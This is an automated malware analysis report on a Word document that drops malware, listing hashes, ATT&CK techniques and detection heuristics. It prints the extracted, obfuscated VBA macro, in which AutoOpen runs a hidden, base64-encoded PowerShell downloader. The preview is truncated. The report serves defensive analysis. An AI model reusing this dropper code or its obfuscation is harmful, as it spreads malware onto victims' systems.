Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2e6829dcde385ed3…

MALICIOUS

Office (OLE)

Size: 104.0 KB
Created: 2018-05-30 19:09:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: b3e43c376109b06dc3616004ad9e544d
SHA-1: 55b356a9a95a2b92e1cdb4761260679a545bd7c8
SHA-256: 2e6829dcde385ed3d05649780771fb168cb51e38e570ce648b5932a466568d56
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which is highly suspicious. The macro assembles a PowerShell command from concatenated string fragments, indicating it is designed to download and execute a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6566615-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6566615-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  14782 bytes
SHA-256: 93c0308dc4ce966c20353f0e1943a3b93df371a4ebd40cd367eb468aed4d34b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vfBTIzaIncsHIY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wzwnF()
On Error Resume Next
Select Case KAlStHGr
      Case 68228
         XsIjuv = 19394
         zHjjA = CDbl(4032)
      Case 76179
         vPOZM = fGLHEj
         UuPKB = 65359
End Select
Select Case KAlObpCqW
      Case 36131
         AAwRf = 85861
         qdKdm = CDbl(25051)
      Case 3865
         nrdwi = QZwUL
         UZMipS = 24556
End Select
wzwnF = COHPmzq + Shell(rjvzjrRnUQ + Chr(vbKeyP) + pIcVdL + fZWbm + CYVfwmlU + pwzifiohh + jKzdPrduQH + vJfaFObC + pbzjJzPf, vYVlrHiH + vbHide + NarouUGiHQ)
Select Case KAlLImBM
      Case 17006
         mAYvP = 24977
         CLMao = CDbl(10148)
      Case 69614
         zzTGrQ = boUAw
         iEckV = 19165
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlZaYvYQ
      Case 45106
         WPiHV = 67797
         phFRm = CDbl(41854)
      Case 47847
         bPQqXH = pSvGCZ
         XiatP = 9391
End Select
wzwnF
Select Case KAlqsbdW
      Case 29730
         fEWIAq = 95708
         IaAtmZ = CDbl(22481)
      Case 23432
         jjQJX = tFTLkW
         MBroKO = 46781
End Select
End Sub


Attribute VB_Name = "CiaqZztWSzijLz"
Function pIcVdL()
On Error Resume Next
Select Case KAllAIha
      Case 9636
         rFzjor = 65187
         iovGG = CDbl(89684)
      Case 70939
         LvAGh = EcHoz
         ZAHts = 68538
End Select
szVRCP = "owersHeLL" + " -WinDow" + "sTyle hidde" + "n -e LgA" + "gACgAIAAkAHA" + "AUwBIAG8ATQBFA" + "FsAMgAxAF0AK" + "wAkAHA" + "AUwBoAG8AT" + "QBlAFsAMwAw"
Select Case KAllZzDNC
      Case 34342
         FCTrY = 794
         zlZwIY = CDbl(1804)
      Case 44314
         zrUiih = NWEzp
         smDPI = 98228
End Select
OzjPzXuwn = "AF0AKwA" + "nAFgAJwApAC" + "AAKAA" + "gACgAJwBO" + "AEUAVgAnACsAJw" + "BuACcAKwAnAHM" + "AJwArACcAYQAnA"
Select Case KAlnwbNn
      Case 5599
         TuaSk = 4257
         DVinf = CDbl(45701)
      Case 431
         UTBvm = mutPBz
         CQGqbL = 67246
End Select
hDBMaiiJCO = "CsAJwBkACcAKwAn" + "AGEAc" + "wBkACAAPQAg" + "ACYAKAAn" + "ACsAJwB" + "wADUASQBuAH"
Select Case KAlwmOnn
      Case 79056
         VcdbZ = 64778
         HMsQcj = CDbl(99614)
      Case 64653
         iEkAF = wELRmY
         mIwDVZ = 31195
End Select
wLfRniTjjCO = "AAJwArACcANQAnA" + "CsAJwBJACs" + "AcAA1AEk" + "AJwArA" + "CcAZQAnACsAJwB"
Select Case KAlaXGbJu
      Case 97521
         jCTOj = 60998
         DoLtjY = CDbl(29571)
      Case 15697
         DZZjSY = aRQIj
         Zwjztc = 28729
End Select
wiOEZFVK = "wADUASQArAHAANQ" + "BJAHcALQBvAGIA" + "agBlAGMAJwArA" + "CcAcAA1A"
Select Case KAlJwGZv
      Case 29581
         fjNLP = 20833
         jVOsK = CDbl(83734)
      Case 86943
         SXBYPP = jimtc
         bSKWJA = 90441
End Select
bhwMi = "CcAKwAnAEk" + "AJwArACcA" + "KwBwADUASQB" + "0AHAANQBJACkAIA" + "ByAGEAbgBkAG8" + "AbQA7" + "AE4ARQ" + "BWAFkAJwArACcA" + "WQBVACAAPQ" + "AgACcAKwAnAC4A"
Select Case KAlCzQTBM
      Case 21951
         BSXZMf = 68196
         WAuSA = CDbl(67206)
      Case 46972
         iiICE = BqwPQ
         kFNCBA = 56172
End Select
WALPiApJG = "KABwADU" + "AJwArACcAS" + "QBuAGUAc" + "AA1AEkAKwB" + "wADUAS" + "QB3AHAANQBJ" + "ACcAK" + "wAnACs" + "AcAA1AEkALQAnA" + "CsAJwBvA"
Select Case KAlVDjvj
      Case 73145
         IGchT = 47528
         lWEIdf = CDbl(32057)
      Case 62707
         zPJnRm = RzFDAf
         MTSVsk = 42316
End Select
GhFjboKpwY = "CcAKwAnAGIAJwA" + "rACcAagBlAG" + "MAJwArAC" + "cAdABwA"
Select Case KAlwBqUqw
      Case 85935
         zEpbj = 62874
         wiWOK = CDbl(66744)
      Case 26986
         tGYsp = KYwFP
         Hwzvt = 47728
End Select
MLzXXC = "DUASQApACAAU" + "wAnACsAJwB5" + "AHMAdABlACcAKw" + "AnAG0ALgB" + "OAGUAdAAuAFc" + "AJwArA
... (truncated)